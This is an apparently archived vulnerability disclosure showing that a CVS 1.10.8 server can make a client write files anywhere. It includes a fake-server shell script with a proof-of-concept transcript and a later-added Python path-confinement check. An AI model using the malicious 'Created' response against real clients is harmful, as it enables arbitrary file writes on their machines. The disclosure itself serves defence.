I found a security problem: a cvs server can instruct the client to create
any file at any location on the client machine.

For example, if a client tries to checkout a module `tst' as:

% cvs -f -d :ext:user@server:/cvsroot co tst

and the server includes a dangerous response as follows in its responses,
the client creates /tmp/foo.

Created /tmp/
/cvsroot/tst/foo
/foo/1.1///
u=rw,g=rw,o=rw
4
abc

This problem can be tested by yourself easily as follows.

% ls -l /tmp/foo
ls: /tmp/foo: No such file or directory
% cat crackers-cvs-server
#!/bin/sh
cat <<'End'
Valid-requests Root Valid-responses valid-requests Repository Directory Max-dotdot Static-directory Sticky Checkin-prog Update-prog Entry Kopt Checkin-time Modified Is-modified UseUnchanged Unchanged Notify Questionable Case Argument Argumentx Global_option Gzip-stream wrapper-sendme-rcsOptions Set Kerberos-encrypt expand-modules ci co update diff log add remove update-patches gzip-file-contents status rdiff tag rtag import admin export history release watch-on watch-off watch-add watch-remove watchers editors init annotate noop
ok
Module-expansion tst
ok
Clear-sticky tst/
/cvsroot/tst/
Clear-static-directory tst/
/cvsroot/tst/
E cvs server: Updating tst
Created /tmp/
/cvsroot/tst/foo
/foo/1.1///
u=rw,g=rw,o=rw
4
abc
ok
End
% CVS_RSH=./crackers-cvs-server cvs -f -d :ext:user@server:/cvsroot co tst
cvs server: Updating tst
cvs checkout: in directory /tmp:
cvs checkout: cannot open CVS/Entries for reading: No such file or directory
cvs checkout: cannot open CVS/Entries.Log: No such file or directory
% ls -l /tmp/foo
-rw-r--r--  1 akr  wheel  4 Jul 19 22:01 /tmp/foo
% cat /tmp/foo
abc
% cvs -v

Concurrent Versions System (CVS) 1.10.8 (client/server)

Copyright (c) 1989-1998 Brian Berliner, david d `zoo' zuhn,
                        Jeff Polk, and other authors

CVS may be copied only under the terms of the GNU General Public License,
a copy of which can be found with the CVS distribution kit.

Specify the --help option for further information about CVS

%
--
Tanaka Akira
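As an added example (not part of the post above and not the cvs client's own code), here is a Python sketch of the client-side check a defender would want: parse one `Created` response from the server stream and refuse to write the file when the server-supplied directory is absolute or climbs out of the checkout directory. The two sample responses are constructed from the transcript above; the working directory name is an assumption.

```python
import posixpath

# Constructed from the transcript in the post: the malicious "Created"
# response names the absolute directory /tmp/; the benign one stays in tst/.
MALICIOUS = b"Created /tmp/\n/cvsroot/tst/foo\n/foo/1.1///\nu=rw,g=rw,o=rw\n4\nabc\n"
BENIGN = b"Created tst/\n/cvsroot/tst/foo\n/foo/1.1///\nu=rw,g=rw,o=rw\n4\nabc\n"


def parse_created(stream):
    """Split one 'Created' response into (pathname, repo file, entry line,
    mode, contents): five header lines, then <length> bytes of file body."""
    lines = stream.split(b"\n", 5)
    tag, _, pathname = lines[0].partition(b" ")
    if tag != b"Created" or len(lines) < 6:
        raise ValueError("not a complete Created response")
    repo_file, entry, mode, length = lines[1], lines[2], lines[3], int(lines[4])
    body = lines[5][:length]
    if len(body) != length:
        raise ValueError("short file body")
    return pathname.decode(), repo_file.decode(), entry.decode(), mode.decode(), body


def confine(workdir, pathname, repo_file):
    """Return the local path the file would land at, or raise ValueError if
    the server-chosen directory escapes the working directory."""
    # The client writes to <server directory>/<basename of repository file>.
    local = posixpath.join(pathname, posixpath.basename(repo_file))
    if posixpath.isabs(local) or ".." in local.split("/"):
        raise ValueError(f"rejected unsafe pathname from server: {local!r}")
    root = posixpath.normpath(workdir)
    full = posixpath.normpath(posixpath.join(root, local))
    if not full.startswith(root + "/"):
        raise ValueError(f"path escapes working directory: {full!r}")
    return full


def handle_created(workdir, stream):
    """Parse and confine; returns (local_path, contents) for a safe response."""
    pathname, repo_file, _entry, _mode, body = parse_created(stream)
    return confine(workdir, pathname, repo_file), body


def accepts(workdir, stream):
    """True if the response would be written, False if the check rejects it."""
    try:
        handle_created(workdir, stream)
        return True
    except ValueError:
        return False
```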